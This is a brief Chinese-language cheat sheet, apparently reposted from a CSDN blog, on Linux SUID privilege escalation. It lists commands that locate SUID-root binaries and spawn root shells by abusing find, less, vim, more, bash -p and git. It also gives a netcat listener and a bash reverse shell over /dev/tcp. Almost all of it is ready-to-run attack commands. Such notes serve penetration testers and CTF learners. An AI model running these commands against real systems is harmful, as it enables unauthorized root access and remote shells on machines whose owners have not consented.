linux下suid提权笔记

find

find /bin/ -name ls -exec /bin/nc -lvp123 ;
find /bin/ -name ls -exec /bin/bash -i >& /dev/tcp/127.0.0.1/1234 0>&1 ;

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

less

less /etc/passwd
!/bin/sh

vim

:set shell =/bin/sh
:shell

sudo vim -c “!bash”

more

more filepath
!/bin/sh

bash

bash -p

git

sudo git help status

!/bin/sh

猜你喜欢

转载自blog.csdn.net/qq_41874930/article/details/108189510